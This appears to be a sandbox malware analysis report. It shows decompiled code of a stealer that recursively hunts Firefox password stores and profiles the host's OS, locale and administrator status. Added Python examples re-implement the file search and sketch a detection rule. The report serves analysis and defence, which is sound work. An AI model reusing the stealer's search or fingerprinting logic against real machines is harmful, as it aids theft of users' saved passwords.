LocalFree 5486->5487 5487->5476 5489 bc02c1f 5488->5489 5489->5465 5489->5466 5491 bc017b9 5490->5491 5492 bc017ac gethostbyname 5490->5492 5491->5400 5492->5491 5506 bc02aca 5493->5506 5496 bc02aca 50 API calls 5497 bc02a8f 5496->5497 5498 bc02aca 50 API calls 5497->5498 5499 bc02a9b 5498->5499 5500 bc02aca 50 API calls 5499->5500 5501 bc02aa7 5500->5501 5502 bc02aca 50 API calls 5501->5502 5503 bc02ab6 5502->5503 5504 bc02aca 50 API calls 5503->5504 5505 bc02ac2 5504->5505 5505->4788 5515 bc091be LocalAlloc SHGetFolderPathA 5506->5515 5508 bc02a7e 5508->5496 5509 bc02ad7 5509->5508 5510 bc08f32 6 API calls 5509->5510 5511 bc02ae5 5510->5511 5512 bc01fd3 48 API calls 5511->5512 5513 bc02afd 5512->5513 5514 bc08d3d LocalFree 5513->5514 5514->5508 5515->5509 5517 bc08dda 6 API calls 5516->5517 5518 bc057e1 5517->5518 5519 bc05828 5518->5519 5527 bc05782 5518->5527 5519->4793 5522 bc05782 50 API calls 5523 bc0580a 5522->5523 5524 bc05782 50 API calls 5523->5524 5525 bc0581a 5524->5525 5526 bc08d3d LocalFree 5525->5526 5526->5519 5536 bc091be LocalAlloc SHGetFolderPathA 5527->5536 5529 bc0578e 5530 bc08f32 6 API calls 5529->5530 5535 bc057bf 5529->5535 

Executed Functions

Control-flow Graph

C-Code - Quality: 86%
                                                                                                                                        			E0BC06401(void* __edx, intOrPtr _a4, CHAR* _a8, intOrPtr _a12, char* _a16) {
                                                                                                                                        				signed int _v8;
                                                                                                                                        				struct _WIN32_FIND_DATAA _v332;
                                                                                                                                        				char* _v336;
                                                                                                                                        				CHAR* _v340;
                                                                                                                                        				intOrPtr _v344;
                                                                                                                                        				CHAR* _v348;
                                                                                                                                        				void* _v352;
                                                                                                                                        				intOrPtr _v356;
                                                                                                                                        				char* _v360;
                                                                                                                                        				char* _v364;
                                                                                                                                        				void* __ebx;
                                                                                                                                        				void* __edi;
                                                                                                                                        				void* __esi;
                                                                                                                                        				signed int _t53;
                                                                                                                                        				void* _t60;
                                                                                                                                        				CHAR* _t61;
                                                                                                                                        				void* _t66;
                                                                                                                                        				char* _t68;
                                                                                                                                        				int _t70;
                                                                                                                                        				char* _t72;
                                                                                                                                        				char* _t78;
                                                                                                                                        				int _t84;
                                                                                                                                        				char* _t95;
                                                                                                                                        				char* _t96;
                                                                                                                                        				char* _t99;
                                                                                                                                        				void* _t108;
                                                                                                                                        				char* _t109;
                                                                                                                                        				char* _t114;
                                                                                                                                        				void* _t136;
                                                                                                                                        				void* _t137;
                                                                                                                                        				void* _t140;
                                                                                                                                        				CHAR* _t141;
                                                                                                                                        				signed int _t144;
                                                                                                                                        				void* _t145;
                                                                                                                                        
                                                                                                                                        				_t140 = __edx;
                                                                                                                                        				_t53 =  *0xbc10000; // 0xbb40e64e
                                                                                                                                        				_v8 = _t53 ^ _t144;
				// Remainder of the Firefox-profile credential search. _t114 is the directory to
				// scan: the loop below enumerates it with FindFirstFileA/FindNextFileA, recurses
				// into every subdirectory through E0BC06401 and tests each file name against the
				// Firefox password-store names the stealer is after. Temporaries such as _t92,
				// _t102 and _t111 are decompiler artifacts; they carry the result of the
				// immediately preceding E0BC08F32 (path join) call.
				_v344 = _a4;
				_t114 = _a16;
				_v348 = _a8;
				_v356 = _a12;
				_v360 = _t114;
				if(_t114 == 0 ||  *_t114 == 0) {
					_push(0);
					goto L35;
				} else {
					_t142 = _t114;
					// E0BC08F95 apparently tests whether the path already ends in a separator: it
					// selects "*.*" versus "\\*.*" here and the join separator for the recursion below.
					_t60 = E0BC08F95(_t114);
					_push(_t114);
					_t61 = "\\*.*";
					if(_t60 != 0) {
						_t61 = "*.*";
					}
					_v340 = E0BC08EE2(_t61); // search pattern "<dir>\*.*"
					E0BC08D5E( &_v332,  &_v332, 0, 0x140); // zero the WIN32_FIND_DATAA (sizeof == 0x140)
					_t66 = FindFirstFileA(_v340,  &_v332); // executed
					_v352 = _t66;
					if(_t66 == 0xffffffff) { // INVALID_HANDLE_VALUE
						L33:
						_push(_v340);
						L35:
						return E0BC09FDC(E0BC08D3D(), _t114, _v8 ^ _t144, _t140, _t141, _t142); // free pattern; _v8 ^ ebp is the usual stack-cookie check
					}
					_t141 = "\\";
					do {
						if((_v332.dwFileAttributes & 0x00000010) == 0) { // not FILE_ATTRIBUTE_DIRECTORY: a file
							__eflags =  *0xbc10d54 - 3;
							if( *0xbc10d54 != 3) { // global mode != 3: look for the password stores
								_t142 = StrStrIA;
								_t68 = StrStrIA( &(_v332.cFileName), "signons.sqlite"); // Firefox 3 to 31 password DB
								__eflags = _t68;
								if(_t68 != 0) {
									_v336 = E0BC08F32(E0BC08EE2(_t141, _t114),  &(_v332.cFileName)); // "<dir>\<name>"
									__eflags = E0BC090FC(_t92);
									if(__eflags != 0) {
										_t95 = E0BC01F70(__eflags, _v336);
										_pop(_t136);
										__eflags = _t95;
										if(_t95 == 0) {
											_t96 = E0BC061DF(_v348, _t136, _v356);
											_pop(_t137);
											__eflags = _t96;
											if(__eflags != 0) {
												E0BC06D60(_t137, __eflags, _v344, _v336);
												E0BC06328();
											}
											_t114 = _v360;
										}
									}
									E0BC08D3D(_v336); // free the joined path
								}
								_t70 = lstrlenA( &(_v332.cFileName));
								__eflags = _t70 - 2;
								if(_t70 < 2) {
									L25:
									_t72 = StrStrIA( &(_v332.cFileName), "logins.json"); // Firefox 32+ password store
									__eflags = _t72;
									if(_t72 != 0) {
										E0BC08D3D(E0BC08F32(E0BC08EE2(_t141, _t114),  &(_v332.cFileName)));
										_t145 = _t145 + 0xc;
									}
									_v336 = StrStrIA( &(_v332.cFileName), "signons.txt"); // Firefox 1.x/2.x era stores
									_v364 = StrStrIA( &(_v332.cFileName), "signons2.txt");
									_t78 = StrStrIA( &(_v332.cFileName), "signons3.txt");
									__eflags = _v336;
									if(_v336 == 0) {
										__eflags = _v364;
										if(_v364 != 0) {
											goto L30;
										}
										__eflags = _t78;
										if(_t78 == 0) {
											goto L31;
										}
									}
									goto L30;
								} else {
									// 0x732e read as a little-endian word is the two bytes ".s", the extension of
									// the old Mozilla-suite password files; the word is read from the tail of
									// cFileName (_t144 is the frame pointer). A match skips the L25 tests.
									__eflags =  *((intOrPtr*)(_t144 + _t70 - 0x11e)) - 0x732e;
									if( *((intOrPtr*)(_t144 + _t70 - 0x11e)) == 0x732e) {
										L30:
										E0BC08D3D(E0BC08F32(E0BC08EE2(_t141, _t114),  &(_v332.cFileName)));
										_t145 = _t145 + 0xc;
										goto L31;
									}
									goto L25;
								}
							}
							_t99 = StrStrIA( &(_v332.cFileName), "prefs.js"); // mode == 3: profile preferences only
							__eflags = _t99;
							if(_t99 != 0) {
								_t142 = E0BC08F32(E0BC08EE2(_t141, _t114),  &(_v332.cFileName));
								E0BC01F01(__eflags, _v344, _t102, 0xbeef0001);
								_t145 = _t145 + 0x14;
								E0BC08D3D(_t102);
							}
							goto L31;
						}
						_t142 = lstrcmpiA;
						if(lstrcmpiA(".",  &(_v332.cFileName)) != 0 && lstrcmpiA("..",  &(_v332.cFileName)) != 0) { // skip "." and ".."
							_t108 = E0BC08F95(_t114);
							_push(_t114);
							if(_t108 != 0) {
								_t109 = 0;
								__eflags = 0;
							} else {
								_t109 = _t141;
							}
							_t142 = E0BC08F32(E0BC08EE2(_t109),  &(_v332.cFileName)); // "<dir>\<subdir>"
							E0BC06401(_t140, _v344, _v348, _v356, _t111); // executed -- descend into the subdirectory; 0x0bc06401 is the first instruction address listed for this function, so this is a recursive call
							E0BC08D3D(_t111);
							_t145 = _t145 + 0x1c;
						}
						L31:
						_t84 = FindNextFileA(_v352,  &_v332); // executed
					} while (_t84 != 0);
					FindClose(_v352); // executed
					goto L33;
				}
			}
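The decompiled loop above is hard to read in one pass, so here is an added example, written for this page and not taken from the sample or from the report, that re-implements its file-name tests in Python. It reproduces the branch order of the listing (signons.sqlite first; a name whose last two bytes are ".s" is taken without the logins.json and signons*.txt tests; prefs.js is only looked at when the mode global equals 3) and the recursion into every subdirectory. `MODE_PREFS_ONLY`, `classify`, `walk` and the profile fixture are names and data constructed for the demonstration; the fixture contains empty placeholder files, not real profile data.

```python
"""Re-implementation of the Firefox credential-file search from the decompiled
loop above (added example, not the sample's own code)."""
import os
import shutil
import tempfile

# Stand-in for the global at 0xbc10d54: the value 3 switches the loop to prefs.js only.
MODE_PREFS_ONLY = 3


def _contains(name, needle):
    """StrStrIA semantics: case-insensitive substring search."""
    return needle.lower() in name.lower()


def classify(name, mode):
    """Return the tags under which the decompiled loop would pick up `name`.

    Branch order follows the listing: signons.sqlite is tested first, a file
    whose last two bytes are ".s" (the word 0x732e, little-endian) is taken
    without looking at logins.json or signons*.txt, and prefs.js is only
    examined when the mode global equals 3.
    """
    if mode == MODE_PREFS_ONLY:
        return ["prefs.js"] if _contains(name, "prefs.js") else []
    tags = []
    if _contains(name, "signons.sqlite"):
        tags.append("signons.sqlite")
    # The listing compares a 16-bit word with 0x732e, so this test is case-sensitive.
    if len(name) >= 2 and name.endswith(".s"):
        tags.append("*.s")
        return tags
    if _contains(name, "logins.json"):
        tags.append("logins.json")
    if any(_contains(name, n) for n in ("signons.txt", "signons2.txt", "signons3.txt")):
        tags.append("signons*.txt")
    return tags


def walk(root, mode):
    """Recursive enumeration mirroring FindFirstFileA/FindNextFileA plus the
    self-call on every subdirectory other than '.' and '..'.  Returns sorted
    (path relative to root, tag) pairs with '/' separators."""
    found = []

    def _scan(path):
        with os.scandir(path) as it:
            for entry in it:
                if entry.is_dir(follow_symlinks=False):
                    _scan(entry.path)  # os.scandir never yields '.' or '..'
                    continue
                rel = os.path.relpath(entry.path, root).replace(os.sep, "/")
                for tag in classify(entry.name, mode):
                    found.append((rel, tag))

    _scan(root)
    return sorted(found)


def build_fixture():
    """Constructed Firefox-profile-like tree for the demonstration: empty
    placeholder files only.  Remove it with cleanup()."""
    root = tempfile.mkdtemp(prefix="ff_profile_")
    for rel in (
        "abc123.default/signons.sqlite",
        "abc123.default/logins.json",
        "abc123.default/key3.db",
        "abc123.default/prefs.js",
        "abc123.default/bookmarkbackups/bookmarks.json",
        "legacy/12345678.s",
        "legacy/signons3.txt",
        "notes.txt",
    ):
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        open(full, "w").close()
    return root


def cleanup(root):
    shutil.rmtree(root)


if __name__ == "__main__":
    root = build_fixture()
    try:
        for mode in (0, MODE_PREFS_ONLY):
            print(f"mode={mode}")
            for rel, tag in walk(root, mode):
                print(f"  {tag:15} {rel}")
    finally:
        cleanup(root)
```

Running it prints the four password-store hits for mode 0 and only prefs.js for mode 3; key3.db, the bookmark backup and notes.txt are never touched, which is the list a file-access monitor on a Firefox profile should alert on for this family.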
[Instruction listing for the function at 0x0bc06401 (addresses from 0x0bc06401 to 0x0bc06712 appear in the address column): only the address column survived extraction; the mnemonic and operand columns are not present on this page.]
                                                                                                                                        0x0bc064f3
                                                                                                                                        0x0bc064ef
                                                                                                                                        0x0bc064ef
                                                                                                                                        0x0bc064ef
                                                                                                                                        0x0bc06508
                                                                                                                                        0x0bc0651d
                                                                                                                                        0x0bc06523
                                                                                                                                        0x0bc06528
                                                                                                                                        0x0bc06528
                                                                                                                                        0x0bc066cd
                                                                                                                                        0x0bc066da
                                                                                                                                        0x0bc066e0
                                                                                                                                        0x0bc066ee
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc066ee

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0BC08F95: lstrlenA.KERNEL32(?,0BC09A2B,?,?,?), ref: 0BC08F9F
                                                                                                                                        • FindFirstFileA.KERNELBASE(?,?,?,00000000,00000140), ref: 0BC0648E
                                                                                                                                        • lstrcmpiA.KERNEL32(0BC0D7EC,?), ref: 0BC064C3
                                                                                                                                        • lstrcmpiA.KERNEL32(0BC0D7F0,?), ref: 0BC064D9
                                                                                                                                        • StrStrIA.SHLWAPI(?,prefs.js), ref: 0BC0653F
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrlenA.KERNEL32(00000000,HWID,?,?), ref: 0BC08F07
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrlenA.KERNEL32(HWID), ref: 0BC08F0C
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrcpyA.KERNEL32(00000000,00000000), ref: 0BC08F1D
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrcatA.KERNEL32(00000000,HWID), ref: 0BC08F25
                                                                                                                                          • Part of subcall function 0BC08F32: lstrlenA.KERNEL32(00000000,HWID,?,?,?,0BC09A43), ref: 0BC08F58
                                                                                                                                          • Part of subcall function 0BC08F32: lstrlenA.KERNEL32(00000000,?,0BC09A43), ref: 0BC08F5F
                                                                                                                                          • Part of subcall function 0BC08F32: lstrcpyA.KERNEL32(00000000,00000000,?,0BC09A43), ref: 0BC08F70
                                                                                                                                          • Part of subcall function 0BC08F32: lstrcatA.KERNEL32(00000000,00000000,?,0BC09A43), ref: 0BC08F7A
                                                                                                                                          • Part of subcall function 0BC08D3D: LocalFree.KERNELBASE(00000000,?,0BC08E77,?), ref: 0BC08D49
                                                                                                                                        • StrStrIA.SHLWAPI(?,signons.sqlite), ref: 0BC06591
                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0BC06617
                                                                                                                                        • StrStrIA.SHLWAPI(?,logins.json), ref: 0BC0663D
                                                                                                                                        • StrStrIA.SHLWAPI(?,signons.txt), ref: 0BC0666E
                                                                                                                                        • StrStrIA.SHLWAPI(?,signons2.txt), ref: 0BC06682
                                                                                                                                        • StrStrIA.SHLWAPI(?,signons3.txt), ref: 0BC06696
                                                                                                                                        • FindNextFileA.KERNELBASE(?,00000010), ref: 0BC066DA
                                                                                                                                        • FindClose.KERNELBASE(?), ref: 0BC066EE
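As an added example (not code from the Joe Sandbox report, nor from the sample), the Python below parses API-trace lines in the report's own "Func.Module(args), ref: ADDR" format and flags the pattern the list above shows: a FindFirstFileA/FindNextFileA/FindClose enumeration loop whose filenames are tested with StrStrIA against Mozilla saved-login stores (signons*.txt, signons.sqlite, logins.json), with prefs.js as the profile-directory marker. The trace is a constructed subset of the lines on this page; the rule name, the filename sets and the compare-function list are assumptions of this example.

```python
"""Added example: detect Mozilla credential-store enumeration in a Joe
Sandbox style API trace. Not part of the report; rule name, filename sets
and compare-function list are this example's assumptions."""
import re
from dataclasses import dataclass

# Saved-login stores of Firefox/Thunderbird profiles, old and new formats (assumed list).
MOZILLA_CREDENTIAL_FILES = {
    "signons.txt", "signons2.txt", "signons3.txt",  # legacy stores
    "signons.sqlite",                               # Firefox 3.x to 31
    "logins.json",                                  # Firefox 32 and later
}
PROFILE_MARKERS = {"prefs.js"}  # present in every Mozilla profile directory
COMPARE_FUNCS = {"StrStrIA", "StrStrIW", "lstrcmpiA", "lstrcmpiW", "StrCmpIA", "StrCmpIW"}

# Constructed sample: a subset of the API records listed on the page, format kept verbatim.
SAMPLE_TRACE = """
• Part of subcall function 0BC08F95: lstrlenA.KERNEL32(?,0BC09A2B,?,?,?), ref: 0BC08F9F
• FindFirstFileA.KERNELBASE(?,?,?,00000000,00000140), ref: 0BC0648E
• lstrcmpiA.KERNEL32(0BC0D7EC,?), ref: 0BC064C3
• lstrcmpiA.KERNEL32(0BC0D7F0,?), ref: 0BC064D9
• StrStrIA.SHLWAPI(?,prefs.js), ref: 0BC0653F
• Part of subcall function 0BC08EE2: lstrlenA.KERNEL32(00000000,HWID,?,?), ref: 0BC08F07
• Part of subcall function 0BC08EE2: lstrcatA.KERNEL32(00000000,HWID), ref: 0BC08F25
• Part of subcall function 0BC08D3D: LocalFree.KERNELBASE(00000000,?,0BC08E77,?), ref: 0BC08D49
• StrStrIA.SHLWAPI(?,signons.sqlite), ref: 0BC06591
• lstrlenA.KERNEL32(?), ref: 0BC06617
• StrStrIA.SHLWAPI(?,logins.json), ref: 0BC0663D
• StrStrIA.SHLWAPI(?,signons.txt), ref: 0BC0666E
• StrStrIA.SHLWAPI(?,signons2.txt), ref: 0BC06682
• StrStrIA.SHLWAPI(?,signons3.txt), ref: 0BC06696
• FindNextFileA.KERNELBASE(?,00000010), ref: 0BC066DA
• FindClose.KERNELBASE(?), ref: 0BC066EE
"""

LINE_RE = re.compile(
    r"^(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<func>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)


@dataclass
class ApiCall:
    func: str
    module: str
    args: list
    ref: int        # address of the call site
    subcall: bool   # record attributed to a helper the function calls


def parse_trace(text):
    """Turn report lines into ApiCall records; anything else (headings, blanks) is skipped."""
    calls = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        m = LINE_RE.match(line)
        if not m:
            continue
        calls.append(ApiCall(
            func=m["func"], module=m["module"],
            args=[a.strip() for a in m["args"].split(",")],
            ref=int(m["ref"], 16),
            subcall=m["sub"] is not None,
        ))
    return calls


def string_args(call):
    """Arguments the sandbox resolved to strings: drop '?' and 8-digit hex values."""
    return [a for a in call.args
            if a and a != "?" and not re.fullmatch(r"[0-9A-Fa-f]{8}", a)]


def find_credential_enumeration(calls):
    """Finding when a Find*File loop compares names against credential-store files, else None."""
    own = [c for c in calls if not c.subcall]   # judge the function's own calls only
    funcs = {c.func for c in own}
    has_loop = (funcs & {"FindFirstFileA", "FindFirstFileW"}
                and funcs & {"FindNextFileA", "FindNextFileW"}
                and "FindClose" in funcs)
    if not has_loop:
        return None
    compared = {s.lower() for c in own if c.func in COMPARE_FUNCS for s in string_args(c)}
    hits = sorted(compared & MOZILLA_CREDENTIAL_FILES)
    if not hits:
        return None
    return {
        "rule": "mozilla_credential_store_enumeration",   # assumed rule name
        "credential_files": hits,
        "profile_markers": sorted(compared & PROFILE_MARKERS),
        "loop_start": next(c.ref for c in own if c.func.startswith("FindFirstFile")),
        "loop_end": next(c.ref for c in own if c.func == "FindClose"),
    }


if __name__ == "__main__":
    print(find_credential_enumeration(parse_trace(SAMPLE_TRACE)))
```

Subcall records are excluded on purpose: the lstrcat/lstrlen calls attributed to 0BC08EE2 build the HWID string and belong to a helper, so counting them would make the rule fire on functions that merely share a helper with the enumeration routine.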
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$Find$Filelstrcatlstrcmpilstrcpy$CloseFirstFreeLocalNext
                                                                                                                                        • String ID: *.*$\*.*$logins.json$prefs.js$signons.sqlite$signons.txt$signons2.txt$signons3.txt
                                                                                                                                        • API String ID: 549939916-2271207088
                                                                                                                                        • Opcode ID: 3780b5be003a59aaaea6a736c57fe211d0b5945237f52a01f4361b113b162c31
                                                                                                                                        • Instruction ID: b6f13c408bba2ebc8e5cff11bd9a0db3d1bec0bb05e9a9370fae518a5beabbd1
                                                                                                                                        • Opcode Fuzzy Hash: 3780b5be003a59aaaea6a736c57fe211d0b5945237f52a01f4361b113b162c31
                                                                                                                                        • Instruction Fuzzy Hash: 59718271931229AFDF25AFA4DC46BEE77A9AF05310F0080B5E909E61D0DE709F949F60
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.18%

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 80%
                                                                                                                                        			E0BC02741(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                                        				signed int _v8;
                                                                                                                                        				short _v12;
                                                                                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                        				struct _OSVERSIONINFOA _v172;
                                                                                                                                        				signed int _v176;
                                                                                                                                        				signed int _v180;
                                                                                                                                        				char _v184;
                                                                                                                                        				void* _v188;
                                                                                                                                        				intOrPtr _v192;
                                                                                                                                        				struct _SYSTEM_INFO _v228;
                                                                                                                                        				void* __ebx;
                                                                                                                                        				void* __edi;
                                                                                                                                        				void* __esi;
                                                                                                                                        				signed int _t58;
                                                                                                                                        				int _t65;
                                                                                                                                        				signed int _t70;
                                                                                                                                        				char* _t72;
                                                                                                                                        				int _t73;
                                                                                                                                        				int _t75;
                                                                                                                                        				int _t79;
                                                                                                                                        				signed int _t80;
                                                                                                                                        				signed int _t81;
                                                                                                                                        				void* _t84;
                                                                                                                                        				struct HINSTANCE__* _t88;
                                                                                                                                        				_Unknown_base(*)()* _t95;
                                                                                                                                        				struct HINSTANCE__* _t118;
                                                                                                                                        				void* _t131;
                                                                                                                                        				void* _t132;
                                                                                                                                        				void* _t144;
                                                                                                                                        				signed int _t149;
                                                                                                                                        				intOrPtr* _t151;
                                                                                                                                        				signed int _t152;
                                                                                                                                        
                                                                                                                                        				_t58 =  *0xbc10000; // 0xbb40e64e
                                                                                                                                        				_v8 = _t58 ^ _t152;
                                                                                                                                        				_t144 = __ecx;
                                                                                                                                        				_v192 = E0BC08C9C(__ecx, __edx, __eflags, 0);
                                                                                                                                         				_v176 = 0xbeef0001; // 4-byte marker at the head of the record being built; from its (buffer, .., length) call pattern E0BC08A41 appears to append to that record (inferred, not labelled by the decompiler)
                                                                                                                                        				E0BC08A41( &_v176, __ecx, __ecx, 4);
                                                                                                                                        				_pop(_t131);
                                                                                                                                         				E0BC08D5E( &_v172,  &_v172, 0, 0x9c); // zero 0x9c = 156 bytes = sizeof(OSVERSIONINFOEXA)
                                                                                                                                         				_v172.dwOSVersionInfoSize = 0x9c;
                                                                                                                                         				_t65 = GetVersionExA( &_v172); // host OS version, build number and service pack
                                                                                                                                        				_t143 = _t65;
                                                                                                                                        				E0BC08D5E( &(_v172.szCSDVersion),  &(_v172.szCSDVersion), 0, 0x80);
                                                                                                                                        				_push(4);
                                                                                                                                        				if(_t65 == 0) {
                                                                                                                                        					_v176 = 0;
                                                                                                                                        					E0BC08A41( &_v176, _t131, _t144);
                                                                                                                                        				} else {
                                                                                                                                        					_v176 = 0x9c;
                                                                                                                                        					E0BC08A41( &_v176, _t131, _t144);
                                                                                                                                        					E0BC08A41( &_v172, _t131, _t144, 0x9c);
                                                                                                                                        				}
                                                                                                                                        				_v180 = _v180 & 0x00000000;
                                                                                                                                        				_pop(_t132);
                                                                                                                                         				_t118 = GetModuleHandleA("kernel32.dll");
                                                                                                                                         				if(_t118 == 0 || GetProcAddress(_t118, "GetNativeSystemInfo") == 0) { // resolved at run time because older Windows versions lack these exports; without them the code assumes a 32-bit host
                                                                                                                                        					_t70 = 0;
                                                                                                                                        					__eflags = 0;
                                                                                                                                        					goto L9;
                                                                                                                                        				} else {
                                                                                                                                        					_t151 = GetProcAddress(_t118, "IsWow64Process");
                                                                                                                                        					if(_t151 != 0) {
                                                                                                                                        						 *_t151(GetCurrentProcess(),  &_v180);
                                                                                                                                        					}
                                                                                                                                         					_t70 = 0 | _v180 != 0x00000000; // 1 when this 32-bit process runs under WOW64, i.e. the host is 64-bit
                                                                                                                                        					L9:
                                                                                                                                        					E0BC08C37(_t70);
                                                                                                                                        					_t72 = LocalAlloc(0x40, 0x480);
                                                                                                                                        					_v180 = _t72;
                                                                                                                                         					_t73 = GetLocaleInfoA(0x400, 0x1002, _t72, 0x3ff); // executed; 0x400 = LOCALE_USER_DEFAULT, 0x1002 = LOCALE_SENGCOUNTRY (English country name of the user's locale)
                                                                                                                                        					_v188 = _t73;
                                                                                                                                        					E0BC08C37(_t73);
                                                                                                                                        					if(_v188 != 0) {
                                                                                                                                        						_t105 = _v180;
                                                                                                                                        						if(_v180 != 0) {
                                                                                                                                        							E0BC08C4D(_t105, _t132, _v188);
                                                                                                                                        							_pop(_t132);
                                                                                                                                        						}
                                                                                                                                        					}
                                                                                                                                         					_t75 = GetLocaleInfoA(0x400, 0x1001, _v180, 0x3ff); // 0x1001 = LOCALE_SENGLANGUAGE (English language name); both locale strings go into the record
                                                                                                                                        					_t147 = _t75;
                                                                                                                                        					E0BC08C37(_t75);
                                                                                                                                        					if(_t75 != 0) {
                                                                                                                                        						_t103 = _v180;
                                                                                                                                        						if(_v180 != 0) {
                                                                                                                                        							E0BC08C4D(_t103, _t132, _t147);
                                                                                                                                        							_pop(_t132);
                                                                                                                                        						}
                                                                                                                                        					}
                                                                                                                                        					_v176 = 0;
                                                                                                                                         					_v16.Value = 0;
                                                                                                                                         					_v12 = 0x500; // the two writes set the 6-byte identifier authority to {0,0,0,0,0,5} = SECURITY_NT_AUTHORITY
                                                                                                                                         					_t79 = AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v188); // 0x20 = SECURITY_BUILTIN_DOMAIN_RID, 0x220 = DOMAIN_ALIAS_RID_ADMINS: S-1-5-32-544, BUILTIN\Administrators
                                                                                                                                         					_t163 = _t79;
                                                                                                                                         					if(_t79 != 0) {
                                                                                                                                         						_t80 =  &_v176;
                                                                                                                                         						__imp__CheckTokenMembership(0, _v188, _t80); // executed; NULL token = the caller's own token, so _v176 becomes 1 when the sample runs as an administrator
                                                                                                                                        						__eflags = _t80;
                                                                                                                                        						if(__eflags == 0) {
                                                                                                                                        							goto L16;
                                                                                                                                        						}
                                                                                                                                        						FreeSid(_v188);
                                                                                                                                        						_t81 = _v176;
                                                                                                                                        						goto L19;
                                                                                                                                        					} else {
                                                                                                                                        						L16:
                                                                                                                                        						_t81 = 0;
                                                                                                                                        						L19:
                                                                                                                                        						E0BC08C37(_t81); // executed
                                                                                                                                        						E0BC026A0(_t143, _t144, _t147, _t163); // executed
                                                                                                                                        						_t84 = E0BC099B0( &_v184, _t143); // executed
                                                                                                                                        						_t148 = _t84;
                                                                                                                                        						if(_t84 == 0 || _v184 < 0x14) {
                                                                                                                                        							_t47 =  &_v176;
                                                                                                                                        							 *_t47 = _v176 & 0x00000000;
                                                                                                                                        							__eflags =  *_t47;
                                                                                                                                        							E0BC08A41( &_v176, _t132, _t144, 4);
                                                                                                                                        						} else {
                                                                                                                                        							_v184 = _v184 + 4;
                                                                                                                                        							E0BC08C37(_v184);
                                                                                                                                        							_v184 = _v184 - 4;
                                                                                                                                        							_v176 = _v176 | 0xffffffff;
                                                                                                                                        							E0BC08A41( &_v176, _t132, _t144, 4);
                                                                                                                                        							E0BC08C4D(_t148, _t132, _v184);
                                                                                                                                        						}
                                                                                                                                        						E0BC08D3D(_t148);
                                                                                                                                        						E0BC08D3D(_v180);
                                                                                                                                        						_pop(_t135);
                                                                                                                                        						_t88 = GetModuleHandleA("kernel32.dll");
                                                                                                                                        						if(_t88 == 0) {
                                                                                                                                        							L26:
                                                                                                                                        							GetSystemInfo( &_v228);
                                                                                                                                        							goto L27;
                                                                                                                                        						} else {
                                                                                                                                        							_t95 = GetProcAddress(_t88, "GetNativeSystemInfo");
                                                                                                                                        							_t167 = _t95;
                                                                                                                                        							if(_t95 == 0) {
                                                                                                                                        								goto L26;
                                                                                                                                        							}
                                                                                                                                        							_t135 =  &_v228;
                                                                                                                                        							 *_t95( &_v228); // executed
                                                                                                                                        							L27:
                                                                                                                                        							_t149 = 0x24;
                                                                                                                                        							_v176 = _t149;
                                                                                                                                        							E0BC08A41( &_v176, _t135, _t144, 4);
                                                                                                                                        							E0BC08A41( &_v228, _t135, _t144, _t149);
                                                                                                                                        							return E0BC09FDC(E0BC08D0C(_t144, _v192, _t167), _v192, _v8 ^ _t152, _t143, _t144, _t149);
                                                                                                                                        						}
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                         			}

                                                                                                                                        APIs
                                                                                                                                        • GetVersionExA.KERNEL32(?,?,00000000,0000009C,?,?,1.00), ref: 0BC027A1
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,00000080), ref: 0BC027FF
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0BC02817
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0BC02823
                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000), ref: 0BC02832
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000480), ref: 0BC02856
                                                                                                                                        • GetLocaleInfoA.KERNELBASE(00000400,00001002,00000000,000003FF), ref: 0BC02879
                                                                                                                                        • GetLocaleInfoA.KERNEL32(00000400,00001001,00000000,000003FF), ref: 0BC028B6
                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0BC028FF
                                                                                                                                        • CheckTokenMembership.KERNELBASE(00000000,00000000,BEEF0001), ref: 0BC0291B
                                                                                                                                        • FreeSid.ADVAPI32(00000000), ref: 0BC0292B
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0BC029C5
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0BC029D5
                                                                                                                                        • GetNativeSystemInfo.KERNELBASE(?), ref: 0BC029E6
                                                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 0BC029F1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
